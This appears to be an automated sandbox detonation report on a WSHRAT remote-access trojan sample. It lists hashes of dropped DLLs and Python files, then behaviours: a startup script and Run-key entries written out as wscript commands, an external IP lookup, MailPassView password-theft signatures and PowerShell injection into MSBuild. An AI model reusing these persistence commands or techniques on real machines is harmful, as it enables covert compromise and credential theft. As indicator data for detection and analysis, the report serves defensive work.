| SHA512 | 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 6ea692f862bdeb446e649e4b2893e36f |
| SHA1 | 84fceae03d28ff1907048acee7eae7e45baaf2bd |
| SHA256 | 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2 |
| SHA512 | 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 6ea692f862bdeb446e649e4b2893e36f |
| SHA1 | 84fceae03d28ff1907048acee7eae7e45baaf2bd |
| SHA256 | 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2 |
| SHA512 | 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 8d02dd4c29bd490e672d271700511371 |
| SHA1 | f3035a756e2e963764912c6b432e74615ae07011 |
| SHA256 | c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b |
| SHA512 | d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 8d02dd4c29bd490e672d271700511371 |
| SHA1 | f3035a756e2e963764912c6b432e74615ae07011 |
| SHA256 | c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b |
| SHA512 | d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.dll
| MD5 | d6326267ae77655f312d2287903db4d3 |
| SHA1 | 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f |
| SHA256 | 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9 |
| SHA512 | 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc
| MD5 | e3f691d123a890f18538f5fead7bd6cd |
| SHA1 | f6e77a0008cefa3a7e3f67c7d11c7787391db5d9 |
| SHA256 | 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934 |
| SHA512 | 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc
| MD5 | 31a2fe679cad1b609caba7c961f43d70 |
| SHA1 | 21d411d11ce126c054ea70f90196c81b18eaa550 |
| SHA256 | 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d |
| SHA512 | 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc
| MD5 | 96f8cc58ae6da7199951c19543193a61 |
| SHA1 | c9c75c757cb1ea2198f84d80de052db7d874b7c7 |
| SHA256 | e24b41e43dae2dcda0a88cae0dc52993ce66790d5addd498d772ea5406f6068e |
| SHA512 | fcb0d4c5f7ceac706b764caf495afb3517e807f89e3f21534997400c1b8fcfc7b23e09bfd3a4599ab4bdf388a36f3f9cd7c14f22ae9c48e03b1d85ed7a8c58dc |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\utf_8.py
| MD5 | f932d95afcaea5fdc12e72d25565f948 |
| SHA1 | 2685d94ba1536b7870b7172c06fe72cf749b4d29 |
| SHA256 | 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e |
| SHA512 | a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc
| MD5 | 840a56d291513211bd0e65864b9169f3 |
| SHA1 | af58891c07f864d4753baa1dfdbdd71a614cded1 |
| SHA256 | a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922 |
| SHA512 | b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\aliases.py
| MD5 | 794677da57c541836ef8c0be93415219 |
| SHA1 | 67956cb212acc2b5dc578cff48d1fe189e5274e4 |
| SHA256 | 9ed4517a5778b2efbd76704f841738c12441ff649eed83b2ea033b3843c9b3d5 |
| SHA512 | 33c3fa687ea494029ff6f250557eaaa24647f847255628b9198a8a33859db0a716d5a3c54743d58b796a46102f2a57da3445935ca0fef1245164523ff4294088 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc
| MD5 | cea4fa818d4468f70d14cae1c3fa9593 |
| SHA1 | cb060d183cb2f4850d2199a51e82301f653d51c4 |
| SHA256 | f64180d0a00e09801d9fa616f7fc21ffc7bb532b19209320059eb3d126e0485f |
| SHA512 | 9f434ebacc2d75483b00c4ee687ccd8df69dde06bbf1cb7bb32e7d6ca5db82130f78543a8166446a49fcd51ade6e2f983eb2469dcde0e1f6d4da595fbd01d3a2 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py
| MD5 | 17e3407344267dde764ecaa542cccd4d |
| SHA1 | ec774abd2a9aa2729a8af6a9cd67dfb22fd0acae |
| SHA256 | f3bbcdb6406b9f9a3467ecd5a8ba74f1accb36adc95aa50d805c2927f09a2304 |
| SHA512 | 850b5f7293ac61d41eb5e13791aac643858daac0950ed1271ac1f3534184f8f379c248e94e63a9abbb699ae4436e4324a96daf5465abc6a50cbe99887024e1f6 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc
| MD5 | deddc1aebef1d56aa912f32deff5355f |
| SHA1 | 472c6923a8fae0cfb7fba6890f2c37dfaf685bcc |
| SHA256 | c27434a09d7e90d3e7980427fa6d22d0eb570663e110b68dd9a71f8bcc3aad24 |
| SHA512 | 89edddf61d0ce04650e5886f5dc98931a3ac52ecacac6e8fe78ff2b3c5db5943118b600ca05fec3d4022a6469dfeeea0979b03313fbabfc057ac5772103bd328 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py
| MD5 | 2c098fb1d1a4c0a183da506daa34a786 |
| SHA1 | 55fb1833342ad13c35c6d3cb5fda819327773b21 |
| SHA256 | f89251a16945f7c125554cc91c7e7ed1560b366396c3153a4cadfb7a7133cd03 |
| SHA512 | 375903e7bf79cf6c8e7c4decff482f4b59594aaaef62e01f1f45d0f9e26f9e864690d79cdfbdcf46cd83562cc465ef419cac32739d35bcb9fe6124682a997918 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc
| MD5 | 2312f7d16eed297caa4a0da46f612479 |
| SHA1 | afc6f0ff4b5d57204b20c4127a58e8cdb0f1f09d |
| SHA256 | 3b033fb54ed66cfd73e6cd1479e3a7d7166d70d713d232707dd2b28ac92af2c7 |
| SHA512 | 66faa5cc8ede6e929ac22ba48a6f1136a70879ccbdbe31146c1f4fb9f9d3744976e36fc47c533a3be4a6edb5b72870dc12018ac73924acf6217c17002c35815a |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py
| MD5 | 92c4d5e13fe5abece119aa4d0c4be6c5 |
| SHA1 | 79e464e63e3f1728efe318688fe2052811801e23 |
| SHA256 | 6d5a6c46fe6675543ea3d04d9b27ccce8e04d6dfeb376691381b62d806a5d016 |
| SHA512 | c95f5344128993e9e6c2bf590ce7f2cffa9f3c384400a44c0bc3aca71d666ed182c040ec495ea3af83abbd9053c705334e5f4c3f7c07f65e7031e95fdfb7a561 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py
| MD5 | d1d8d96ee5398cda53cbddca69b8e2ab |
| SHA1 | 3998c0a2124ab260a7d83f296228be90418b8366 |
| SHA256 | 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3 |
| SHA512 | 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py
| MD5 | 82afd9dcb28c19afdc42097fcbdbe662 |
| SHA1 | 329e052afe981c8ba32ff78df2deb9d041c05f8b |
| SHA256 | 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e |
| SHA512 | 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897 |
C:\Users\Admin\AppData\Roaming\CMDCEX~1.ZIP
| MD5 | a8e496443115a63697cb350f47ae1729 |
| SHA1 | a69779b57ecc8457e85066e7a5ab742c70ea653d |
| SHA256 | 6f3cf374a1aa961be87dde5aaeb1706d95cdcadbd1a4c961363e5ff33fab168d |
| SHA512 | 0c3c5504567912cfd8cf40664463cdc518ce6810bfd05af91ffee30b13f4e115a93f6faae8e5c8aa88ee91e2c3b4404126dbdfcffb82aa2625199e432a3cea9c |
C:\Users\Admin\AppData\Roaming\cmdc.exe
| MD5 | 54e8ded7b148a13d3363ac7b33f6eb06 |
| SHA1 | 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9 |
| SHA256 | 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342 |
| SHA512 | bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-05 23:43
Reported
2023-09-05 23:45
Platform
win10v2004-20230831-en
Max time kernel
81s
Max time network
152s
Command Line
Signatures
WSHRAT
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3316 set thread context of 4964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
